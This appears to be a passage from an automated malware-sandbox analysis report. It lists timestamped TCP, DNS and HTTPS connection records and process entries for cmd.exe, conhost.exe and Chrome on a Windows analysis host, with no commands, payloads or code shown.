May 23, 2024 21:07:29.815238953 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.817861080 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.817877054 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.960221052 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.006496906 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.081866026 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.081938028 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.081990004 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.130822897 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.130844116 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.230648994 CEST | 49714 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.230690956 CEST | 443 | 49714 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.230756998 CEST | 49714 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.231601000 CEST | 49714 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.231635094 CEST | 443 | 49714 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.739367008 CEST | 443 | 49714 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.740206003 CEST | 49714 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.740231991 CEST | 443 | 49714 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.741343021 CEST | 443 | 49714 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.741760969 CEST | 49714 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.741919994 CEST | 443 | 49714 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.741961002 CEST | 49714 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.786495924 CEST | 443 | 49714 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.795387983 CEST | 49714 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.922672033 CEST | 443 | 49714 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.922894001 CEST | 443 | 49714 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:30.922950983 CEST | 49714 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.923953056 CEST | 49714 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:30.923984051 CEST | 443 | 49714 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:31.397636890 CEST | 49716 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:07:31.397665977 CEST | 443 | 49716 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:07:31.397725105 CEST | 49716 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:07:31.397922039 CEST | 49716 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:07:31.397929907 CEST | 443 | 49716 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:07:31.441894054 CEST | 443 | 49704 | 23.206.229.209 | 192.168.2.9 |
May 23, 2024 21:07:31.442100048 CEST | 49704 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:32.097558975 CEST | 443 | 49716 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:07:32.097830057 CEST | 49716 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:07:32.097851992 CEST | 443 | 49716 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:07:32.098958969 CEST | 443 | 49716 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:07:32.099024057 CEST | 49716 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:07:32.101465940 CEST | 49716 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:07:32.101536036 CEST | 443 | 49716 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:07:32.154150963 CEST | 49716 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:07:32.154160976 CEST | 443 | 49716 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:07:32.201092005 CEST | 49716 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:07:32.410402060 CEST | 49717 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:32.410446882 CEST | 443 | 49717 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:32.410706997 CEST | 49717 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:32.412506104 CEST | 49717 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:32.412527084 CEST | 443 | 49717 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:33.067471027 CEST | 443 | 49717 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:33.067622900 CEST | 49717 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:33.071666956 CEST | 49717 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:33.071677923 CEST | 443 | 49717 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:33.071969986 CEST | 443 | 49717 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:33.117902040 CEST | 49717 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:33.162498951 CEST | 443 | 49717 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:33.341023922 CEST | 443 | 49717 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:33.341100931 CEST | 443 | 49717 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:33.341214895 CEST | 49717 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:33.341310978 CEST | 49717 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:33.341329098 CEST | 443 | 49717 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:33.341445923 CEST | 49717 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:33.341454029 CEST | 443 | 49717 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:33.401804924 CEST | 49718 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:33.401866913 CEST | 443 | 49718 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:33.402373075 CEST | 49718 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:33.402499914 CEST | 49718 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:33.402518034 CEST | 443 | 49718 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:34.082552910 CEST | 443 | 49718 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:34.082669020 CEST | 49718 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:34.084508896 CEST | 49718 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:34.084517956 CEST | 443 | 49718 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:34.084737062 CEST | 443 | 49718 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:34.086620092 CEST | 49718 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:34.130506992 CEST | 443 | 49718 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:34.391346931 CEST | 443 | 49718 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:34.391417980 CEST | 443 | 49718 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:34.391609907 CEST | 49718 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:34.399424076 CEST | 49718 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:34.399446964 CEST | 443 | 49718 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:34.399460077 CEST | 49718 | 443 | 192.168.2.9 | 2.19.85.159 |
May 23, 2024 21:07:34.399466038 CEST | 443 | 49718 | 2.19.85.159 | 192.168.2.9 |
May 23, 2024 21:07:34.638729095 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 23, 2024 21:07:39.891518116 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:39.891552925 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:39.891868114 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:39.893012047 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:39.893033981 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:40.809256077 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:40.809647083 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:40.811259031 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:40.811269999 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:40.811521053 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:40.858006001 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:40.874313116 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:40.918494940 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.198208094 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.198275089 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.198298931 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.198333979 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:41.198342085 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.198375940 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.198393106 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.198405027 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:41.198422909 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:41.198422909 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:41.198467016 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:41.211595058 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.211705923 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:41.211729050 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.211745977 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.211837053 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:41.212785959 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:41.212810993 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.212892056 CEST | 49719 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:07:41.212902069 CEST | 443 | 49719 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:07:41.519674063 CEST | 49704 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:41.519896030 CEST | 49704 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:41.520276070 CEST | 49721 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:41.520302057 CEST | 443 | 49721 | 23.206.229.209 | 192.168.2.9 |
May 23, 2024 21:07:41.520375013 CEST | 49721 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:41.520631075 CEST | 49721 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:41.520642996 CEST | 443 | 49721 | 23.206.229.209 | 192.168.2.9 |
May 23, 2024 21:07:41.524635077 CEST | 443 | 49704 | 23.206.229.209 | 192.168.2.9 |
May 23, 2024 21:07:41.530356884 CEST | 443 | 49704 | 23.206.229.209 | 192.168.2.9 |
May 23, 2024 21:07:41.999603987 CEST | 443 | 49716 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:07:41.999666929 CEST | 443 | 49716 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:07:41.999715090 CEST | 49716 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:07:42.204241991 CEST | 443 | 49721 | 23.206.229.209 | 192.168.2.9 |
May 23, 2024 21:07:42.204319000 CEST | 49721 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:42.297646046 CEST | 49716 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:07:42.297669888 CEST | 443 | 49716 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:08:01.406649113 CEST | 443 | 49721 | 23.206.229.209 | 192.168.2.9 |
May 23, 2024 21:08:01.406738997 CEST | 49721 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:08:14.983787060 CEST | 49705 | 80 | 192.168.2.9 | 88.221.110.64 |
May 23, 2024 21:08:14.989464998 CEST | 80 | 49705 | 88.221.110.64 | 192.168.2.9 |
May 23, 2024 21:08:14.989569902 CEST | 49705 | 80 | 192.168.2.9 | 88.221.110.64 |
May 23, 2024 21:08:17.658000946 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:17.658041000 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:17.658155918 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:17.658579111 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:17.658590078 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.510966063 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.511059999 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:18.512557030 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:18.512567043 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.512800932 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.514234066 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:18.558499098 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.910152912 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.910182953 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.910269976 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:18.910294056 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.910353899 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:18.925182104 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.925256968 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.925273895 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:18.925276995 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.925324917 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:18.925520897 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:18.925539017 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:18.925565958 CEST | 49722 | 443 | 192.168.2.9 | 20.114.59.183 |
May 23, 2024 21:08:18.925571918 CEST | 443 | 49722 | 20.114.59.183 | 192.168.2.9 |
May 23, 2024 21:08:31.422708988 CEST | 49724 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:08:31.422753096 CEST | 443 | 49724 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:08:31.422863007 CEST | 49724 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:08:31.423053980 CEST | 49724 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:08:31.423069954 CEST | 443 | 49724 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:08:32.098472118 CEST | 443 | 49724 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:08:32.098918915 CEST | 49724 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:08:32.098941088 CEST | 443 | 49724 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:08:32.099677086 CEST | 443 | 49724 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:08:32.099993944 CEST | 49724 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:08:32.100085974 CEST | 443 | 49724 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:08:32.155567884 CEST | 49724 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:08:42.003484011 CEST | 443 | 49724 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:08:42.003542900 CEST | 443 | 49724 | 142.250.181.228 | 192.168.2.9 |
May 23, 2024 21:08:42.003608942 CEST | 49724 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:08:42.297641993 CEST | 49724 | 443 | 192.168.2.9 | 142.250.181.228 |
May 23, 2024 21:08:42.297672987 CEST | 443 | 49724 | 142.250.181.228 | 192.168.2.9 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 23, 2024 21:07:27.792256117 CEST | 52416 | 53 | 192.168.2.9 | 1.1.1.1 |
May 23, 2024 21:07:27.792373896 CEST | 53034 | 53 | 192.168.2.9 | 1.1.1.1 |
May 23, 2024 21:07:27.807441950 CEST | 53 | 56625 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:07:27.837382078 CEST | 53 | 56987 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:07:28.814388990 CEST | 58859 | 53 | 192.168.2.9 | 1.1.1.1 |
May 23, 2024 21:07:28.814654112 CEST | 56732 | 53 | 192.168.2.9 | 1.1.1.1 |
May 23, 2024 21:07:29.092950106 CEST | 53 | 58859 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:07:29.098540068 CEST | 53 | 56732 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:07:29.139383078 CEST | 53 | 60870 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:07:30.017195940 CEST | 53 | 52416 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:07:30.031208992 CEST | 53 | 53034 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:07:31.375922918 CEST | 61867 | 53 | 192.168.2.9 | 1.1.1.1 |
May 23, 2024 21:07:31.376275063 CEST | 63413 | 53 | 192.168.2.9 | 1.1.1.1 |
May 23, 2024 21:07:31.386106968 CEST | 53 | 61867 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:07:31.393225908 CEST | 53 | 63413 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:07:46.406034946 CEST | 53 | 57365 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:08:05.295909882 CEST | 53 | 56086 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:08:15.114998102 CEST | 138 | 138 | 192.168.2.9 | 192.168.2.255 |
May 23, 2024 21:08:26.708199024 CEST | 53 | 55800 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:08:27.676335096 CEST | 53 | 51414 | 1.1.1.1 | 192.168.2.9 |
May 23, 2024 21:08:54.461566925 CEST | 53 | 54526 | 1.1.1.1 | 192.168.2.9 |
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
May 23, 2024 21:07:30.017267942 CEST | 192.168.2.9 | 1.1.1.1 | c1f1 | (Port unreachable) | Destination Unreachable |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
May 23, 2024 21:07:27.792256117 CEST | 192.168.2.9 | 1.1.1.1 | 0xd522 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 23, 2024 21:07:27.792373896 CEST | 192.168.2.9 | 1.1.1.1 | 0xa2f3 | Standard query (0) | 65 | IN (0x0001) | false | |
May 23, 2024 21:07:28.814388990 CEST | 192.168.2.9 | 1.1.1.1 | 0x451b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 23, 2024 21:07:28.814654112 CEST | 192.168.2.9 | 1.1.1.1 | 0xb06f | Standard query (0) | 65 | IN (0x0001) | false | |
May 23, 2024 21:07:31.375922918 CEST | 192.168.2.9 | 1.1.1.1 | 0x8a9d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 23, 2024 21:07:31.376275063 CEST | 192.168.2.9 | 1.1.1.1 | 0x21c8 | Standard query (0) | 65 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
May 23, 2024 21:07:29.092950106 CEST | 1.1.1.1 | 192.168.2.9 | 0x451b | No error (0) | 70.38.21.234 | A (IP address) | IN (0x0001) | false | ||
May 23, 2024 21:07:30.017195940 CEST | 1.1.1.1 | 192.168.2.9 | 0xd522 | No error (0) | 70.38.21.234 | A (IP address) | IN (0x0001) | false | ||
May 23, 2024 21:07:31.386106968 CEST | 1.1.1.1 | 192.168.2.9 | 0x8a9d | No error (0) | 142.250.181.228 | A (IP address) | IN (0x0001) | false | ||
May 23, 2024 21:07:31.393225908 CEST | 1.1.1.1 | 192.168.2.9 | 0x21c8 | No error (0) | 65 | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.9 | 49711 | 70.38.21.234 | 443 | 7696 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:29 UTC | 669 | OUT | |
2024-05-23 19:07:29 UTC | 164 | IN | |
2024-05-23 19:07:29 UTC | 315 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.9 | 49712 | 70.38.21.234 | 443 | 7696 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:29 UTC | 588 | OUT | |
2024-05-23 19:07:30 UTC | 164 | IN | |
2024-05-23 19:07:30 UTC | 315 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.9 | 49714 | 70.38.21.234 | 443 | 7696 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:30 UTC | 341 | OUT | |
2024-05-23 19:07:30 UTC | 164 | IN | |
2024-05-23 19:07:30 UTC | 315 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.9 | 49717 | 2.19.85.159 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:33 UTC | 161 | OUT | |
2024-05-23 19:07:33 UTC | 467 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.9 | 49718 | 2.19.85.159 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:34 UTC | 239 | OUT | |
2024-05-23 19:07:34 UTC | 535 | IN | |
2024-05-23 19:07:34 UTC | 55 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.9 | 49719 | 20.114.59.183 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:07:40 UTC | 306 | OUT | |
2024-05-23 19:07:41 UTC | 560 | IN | |
2024-05-23 19:07:41 UTC | 15824 | IN | |
2024-05-23 19:07:41 UTC | 8666 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.9 | 49722 | 20.114.59.183 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 19:08:18 UTC | 306 | OUT | |
2024-05-23 19:08:18 UTC | 560 | IN | |
2024-05-23 19:08:18 UTC | 15824 | IN | |
2024-05-23 19:08:18 UTC | 9633 | IN |
Click to jump to process
Click to jump to process
Click to jump to process
Target ID: | 1 |
Start time: | 15:07:22 |
Start date: | 23/05/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7d0650000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 15:07:22 |
Start date: | 23/05/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 15:07:22 |
Start date: | 23/05/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7d0650000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 15:07:22 |
Start date: | 23/05/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 15:07:25 |
Start date: | 23/05/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b2cb0000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 15:07:25 |
Start date: | 23/05/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b2cb0000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |